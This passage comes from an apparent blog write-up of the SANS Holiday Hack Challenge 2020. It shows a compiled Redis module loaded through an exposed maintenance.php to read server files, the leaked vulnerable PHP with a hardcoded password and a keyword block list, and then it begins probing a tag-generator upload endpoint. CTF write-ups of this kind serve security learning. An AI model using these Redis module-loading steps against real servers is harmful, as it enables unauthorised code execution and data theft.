&lt;span class="hll"&gt;    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;RedisModule_CreateCommand&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;&amp;quot;copyindex.perform&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;CopyIndex_RedisCommand&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;&amp;quot;fast random&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="n"&gt;REDISMODULE_ERR&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;    &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;REDISMODULE_ERR&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;REDISMODULE_OK&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;I found the &lt;code&gt;redismodule.h&lt;/code&gt; via a DuckDuckGo search, on &lt;a class="reference external" href="https://github.com/wujunze/redis-module-panda/blob/master/redismodule.h"&gt;this Github
project&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Now, how did I find the path to the &lt;code&gt;index.php&lt;/code&gt;? First of all, we saw
that the index page was named &lt;code&gt;index.php&lt;/code&gt; via the Redis key
&lt;code&gt;example2&lt;/code&gt;. How about the path? We can see that the webserver is Apache
by sending a malformed request:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;player@f5bd214e5c90:~$&lt;/span&gt; curl &lt;span class="s2"&gt;&amp;quot;http://localhost/maintenance.php?cmd= &amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;&amp;lt;!DOCTYPE HTML PUBLIC &amp;quot;-//IETF//DTD HTML 2.0//EN&amp;quot;&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;&amp;lt;html&amp;gt;&amp;lt;head&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;&amp;lt;title&amp;gt;400 Bad Request&amp;lt;/title&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;&amp;lt;/head&amp;gt;&amp;lt;body&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;&amp;lt;h1&amp;gt;Bad Request&amp;lt;/h1&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;&amp;lt;p&amp;gt;Your browser sent a request that this server could not understand.&amp;lt;br /&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;&amp;lt;/p&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;&amp;lt;hr&amp;gt;&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;&amp;lt;address&amp;gt;Apache/2.4.38 (Debian) Server at 127.0.0.1 Port 80&amp;lt;/address&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;&amp;lt;/body&amp;gt;&amp;lt;/html&amp;gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;If we check the only enabled site configuration file, we can see that the
webroot is under &lt;code&gt;/var/www/html&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;player@f5bd214e5c90:~$&lt;/span&gt; grep DocumentRoot /etc/apache2/sites-enabled/000-default.conf
&lt;span class="go"&gt;        DocumentRoot /var/www/html&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now, let's compile our module and load into Redis:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;player@f5bd214e5c90:~$&lt;/span&gt; gcc -fPIC -std&lt;span class="o"&gt;=&lt;/span&gt;gnu99 -c -o module.o module.c
&lt;span class="gp"&gt;player@f5bd214e5c90:~$&lt;/span&gt; ld -o module.so module.o -shared -Bsymbolic -lc
&lt;span class="gp"&gt;player@f5bd214e5c90:~$&lt;/span&gt; curl &lt;span class="s2"&gt;&amp;quot;http://localhost/maintenance.php?cmd=module,load,/home/player/module.so&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;Running: redis-cli --raw -a &amp;#39;&amp;lt;password censored&amp;gt;&amp;#39; &amp;#39;module&amp;#39; &amp;#39;load&amp;#39; &amp;#39;/home/player/module.so&amp;#39;&lt;/span&gt;

&lt;span class="hll"&gt;&lt;span class="go"&gt;OK&lt;/span&gt;
&lt;/span&gt;&lt;span class="gp"&gt;player@f5bd214e5c90:~$&lt;/span&gt; curl &lt;span class="s2"&gt;&amp;quot;http://localhost/maintenance.php?cmd=module,list&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;Running: redis-cli --raw -a &amp;#39;&amp;lt;password censored&amp;gt;&amp;#39; &amp;#39;module&amp;#39; &amp;#39;list&amp;#39;&lt;/span&gt;

&lt;span class="go"&gt;name&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;copyindex&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;ver&lt;/span&gt;
&lt;span class="go"&gt;1&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Our module was properly loaded. Let's call our method
&lt;code&gt;copyindex.perform&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;player@f5bd214e5c90:~$&lt;/span&gt; curl &lt;span class="s2"&gt;&amp;quot;http://localhost/maintenance.php?cmd=copyindex.perform&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;^C&lt;/span&gt;
&lt;span class="gp"&gt;player@f5bd214e5c90:~$&lt;/span&gt; ls -lh index.php
&lt;span class="hll"&gt;&lt;span class="go"&gt;-rwx------ 1 player player 488 Dec 29 15:01 index.php&lt;/span&gt;
&lt;/span&gt;&lt;span class="gp"&gt;player@f5bd214e5c90:~$&lt;/span&gt; cat index.php
&lt;span class="go"&gt;&amp;lt;?php&lt;/span&gt;

&lt;span class="gp"&gt;#&lt;/span&gt; We found the bug!!
&lt;span class="gp"&gt;#&lt;/span&gt;
&lt;span class="gp"&gt;#&lt;/span&gt;         &lt;span class="se"&gt;\ &lt;/span&gt;  /
&lt;span class="gp"&gt;#&lt;/span&gt;         .&lt;span class="se"&gt;\-&lt;/span&gt;/.
&lt;span class="gp"&gt;#&lt;/span&gt;     /&lt;span class="se"&gt;\ &lt;/span&gt;&lt;span class="o"&gt;()&lt;/span&gt;   &lt;span class="o"&gt;()&lt;/span&gt;
&lt;span class="gp"&gt;#&lt;/span&gt;       &lt;span class="se"&gt;\/&lt;/span&gt;~---~&lt;span class="se"&gt;\.&lt;/span&gt;-~^-.
&lt;span class="gp"&gt;#&lt;/span&gt; .-~^-./   &lt;span class="p"&gt;|&lt;/span&gt;   &lt;span class="se"&gt;\-&lt;/span&gt;--.
&lt;span class="gp"&gt;#&lt;/span&gt;      &lt;span class="o"&gt;{&lt;/span&gt;    &lt;span class="p"&gt;|&lt;/span&gt;    &lt;span class="o"&gt;}&lt;/span&gt;   &lt;span class="se"&gt;\&lt;/span&gt;
&lt;span class="c1"&gt;#    .-~\   |   /~-.&lt;/span&gt;
&lt;span class="gp"&gt;#&lt;/span&gt;   /    &lt;span class="se"&gt;\ &lt;/span&gt; A  /    &lt;span class="se"&gt;\&lt;/span&gt;
&lt;span class="c1"&gt;#         \/ \/&lt;/span&gt;
&lt;span class="gp"&gt;#&lt;/span&gt;

&lt;span class="go"&gt;echo &amp;quot;Something is wrong with this page! Please use http://localhost/maintenance.php to see if you can figure out what&amp;#39;s going on&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;?&amp;gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The method hangs, and I have to stop the call with &lt;code&gt;Ctrl+C&lt;/code&gt;. However, the
code still worked, and we can get the content of &lt;code&gt;index.php&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;We can use the same trick to recover the content of &lt;code&gt;maintenance.php&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="cp"&gt;&amp;lt;?php&lt;/span&gt;
&lt;span class="nv"&gt;$redis_password&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;R3disp@ss&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="nb"&gt;isset&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$_REQUEST&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;cmd&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt; &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="nv"&gt;$_REQUEST&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;cmd&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;die&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;&lt;span class="se"&gt;\n\n&lt;/span&gt;&lt;span class="s2"&gt;ERROR: &amp;#39;cmd&amp;#39; argument required (use commas to separate commands); eg:&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s2"&gt;curl http://localhost/maintenance.php?cmd=help&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s2"&gt;curl http://localhost/maintenance.php?cmd=mget,example1&lt;/span&gt;&lt;span class="se"&gt;\n\n&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="c1"&gt;# Pull apart the command, escape it, and put it back together&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="nv"&gt;$cmd&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;implode&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39; &amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;array_map&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;escapeshellarg&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;explode&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;,&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$_REQUEST&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;cmd&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;])));&lt;/span&gt;
&lt;/span&gt;
&lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;strpos&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$cmd&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;scan&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;!==&lt;/span&gt; &lt;span class="k"&gt;false&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="k"&gt;die&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&amp;#39;scan&amp;#39; is not allowed&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;strpos&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$cmd&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;requirepass&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;!==&lt;/span&gt; &lt;span class="k"&gt;false&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="k"&gt;die&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&amp;#39;requirepass&amp;#39; is not allowed&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="nv"&gt;$cmd&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;redis-cli --raw -a &amp;#39;&lt;/span&gt;&lt;span class="si"&gt;$redis_password&lt;/span&gt;&lt;span class="s2"&gt;&amp;#39; &lt;/span&gt;&lt;span class="si"&gt;$cmd&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="k"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;Running: &amp;quot;&lt;/span&gt; &lt;span class="o"&gt;.&lt;/span&gt; &lt;span class="nb"&gt;str_replace&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$redis_password&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&amp;lt;password censored&amp;gt;&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$cmd&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;.&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;&lt;span class="se"&gt;\n\n&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="nv"&gt;$result&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;shell_exec&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$cmd&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="k"&gt;echo&lt;/span&gt; &lt;span class="nv"&gt;$result&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="cp"&gt;?&amp;gt;&lt;/span&gt;&lt;span class="x"&gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="broken-tag-generator"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id37"&gt;Broken Tag Generator&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Ooooooh boy. Each year, there's a least one objective where I go down a rabbit
hole that I can't get out of, even if the answer was smacking me in the face.
This year, it's the Broken Tag Generator.&lt;/p&gt;
&lt;p&gt;The Tag Generator can be used to generate gift tags:&lt;/p&gt;
&lt;img alt="tag_generator_presentation.png" class="align-center" src="/images/sans-christmas-challenge-2020/tag_generator_presentation.png" /&gt;
&lt;p&gt;You can select a template, add cliparts, text labels, and even upload you own
images. The goal is to recover the value of the &lt;code&gt;GREETZ&lt;/code&gt; environment
variable.&lt;/p&gt;
&lt;div class="section" id="all-the-dead-ends-yay"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id38"&gt;All the dead ends, yay!&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;As usual, I'll detail every dead end I took, to explain my thought process.
If you just want the right solution, you can just skip to &lt;a class="reference external" href="#the-right-solution"&gt;the next section&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Obviously, the interesting functionality is the upload, because it can lead
to all sorts of trouble. So I started by uploading a text file:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;POST&lt;/span&gt; &lt;span class="nn"&gt;/upload&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;tag-generator.kringlecastle.com&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0&lt;/span&gt;
&lt;span class="na"&gt;Accept&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;*/*&lt;/span&gt;
&lt;span class="na"&gt;Accept-Language&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3&lt;/span&gt;
&lt;span class="na"&gt;Accept-Encoding&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;gzip, deflate&lt;/span&gt;
&lt;span class="na"&gt;X-Requested-With&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;XMLHttpRequest&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;multipart/form-data; boundary=---------------------------26271296542925243330575575204&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;228&lt;/span&gt;
&lt;span class="na"&gt;Origin&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;https://tag-generator.kringlecastle.com&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;Referer&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;https://tag-generator.kringlecastle.com/&lt;/span&gt;

-----------------------------26271296542925243330575575204
Content-Disposition: form-data; name=&amp;quot;my_file[]&amp;quot;; filename=&amp;quot;test.txt&amp;quot;
Content-Type: text/plain

test

-----------------------------26271296542925243330575575204--
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;501&lt;/span&gt; &lt;span class="ne"&gt;Not Implemented&lt;/span&gt;
&lt;span class="na"&gt;Server&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nginx/1.14.2&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Wed, 30 Dec 2020 13:48:05 GMT&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;text/html;charset=utf-8&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;129&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;X-XSS-Protection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;1; mode=block&lt;/span&gt;
&lt;span class="na"&gt;X-Content-Type-Options&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nosniff&lt;/span&gt;
&lt;span class="na"&gt;X-Frame-Options&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;SAMEORIGIN&lt;/span&gt;

&lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;h1&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;Something went wrong!&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;h1&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;p&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;Error in /app/lib/app.rb: Unsupported file type: /tmp/RackMultipart20201230-1-1ghfubj.txt&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;p&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Several interesting things:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;The application seems to be coded in Ruby. We can guess that from the
&lt;code&gt;/app/lib/app.rb&lt;/code&gt; file.&lt;/li&gt;
&lt;li&gt;The web server is an nginx 1.14.2, which is the version of nginx in &lt;a class="reference external" href="https://packages.debian.org/buster/nginx"&gt;Debian
Buster&lt;/a&gt;, the latest Debian
stable version.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This means that any old Ruby, or Ruby on Rails, vulnerabilities shouldn't work.
I still tried some, like the &lt;a class="reference external" href="https://www.exploit-db.com/exploits/40561"&gt;Dynamic Render File Upload&lt;/a&gt;
and the &lt;a class="reference external" href="https://github.com/mpgn/Rails-doubletap-RCE"&gt;Rails Doubletap RCE&lt;/a&gt;,
but to no avail.&lt;/p&gt;
&lt;p&gt;I then tried to upload valid image files, such as the SANS logo:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;POST&lt;/span&gt; &lt;span class="nn"&gt;/upload&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;tag-generator.kringlecastle.com&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0&lt;/span&gt;
&lt;span class="na"&gt;Accept&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;*/*&lt;/span&gt;
&lt;span class="na"&gt;Accept-Language&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3&lt;/span&gt;
&lt;span class="na"&gt;Accept-Encoding&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;gzip, deflate&lt;/span&gt;
&lt;span class="na"&gt;X-Requested-With&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;XMLHttpRequest&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;multipart/form-data; boundary=---------------------------217713438141946588972652502718&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;2143&lt;/span&gt;
&lt;span class="na"&gt;Origin&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;https://tag-generator.kringlecastle.com&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;Referer&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;https://tag-generator.kringlecastle.com/&lt;/span&gt;

-----------------------------217713438141946588972652502718
Content-Disposition: form-data; name=&amp;quot;my_file[]&amp;quot;; filename=&amp;quot;sans_logo.png&amp;quot;
Content-Type: image/png

PNG[snip]
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;Server&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nginx/1.14.2&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Wed, 30 Dec 2020 13:56:31 GMT&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/json&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;44&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;X-Content-Type-Options&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nosniff&lt;/span&gt;
&lt;span class="na"&gt;Strict-Transport-Security&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;max-age=15552000; includeSubDomains&lt;/span&gt;
&lt;span class="na"&gt;X-XSS-Protection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;1; mode=block&lt;/span&gt;
&lt;span class="na"&gt;X-Robots-Tag&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;none&lt;/span&gt;
&lt;span class="na"&gt;X-Download-Options&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;noopen&lt;/span&gt;
&lt;span class="na"&gt;X-Permitted-Cross-Domain-Policies&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;none&lt;/span&gt;

&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;eba003cc-5221-454e-87d7-ffc484d29872.png&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This time, we get a filename, that we can use to download the image:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;GET&lt;/span&gt; &lt;span class="nn"&gt;/image?id=eba003cc-5221-454e-87d7-ffc484d29872.png&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;tag-generator.kringlecastle.com&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0&lt;/span&gt;
&lt;span class="na"&gt;Accept&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;image/webp,*/*&lt;/span&gt;
